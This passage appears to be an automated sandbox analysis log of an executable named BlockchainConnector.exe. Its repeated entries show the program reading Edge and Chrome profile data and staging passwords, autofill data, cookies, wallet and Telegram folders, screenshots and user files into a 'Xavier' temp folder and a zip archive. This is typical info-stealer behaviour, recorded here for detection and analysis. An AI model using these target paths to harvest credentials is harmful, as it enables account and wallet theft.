Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Downloads\BPMLNOBVSB.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Downloads\UMMBDNEQBN.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\Downloads\WKXEWIOTXI.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Telegram VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Telegram VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
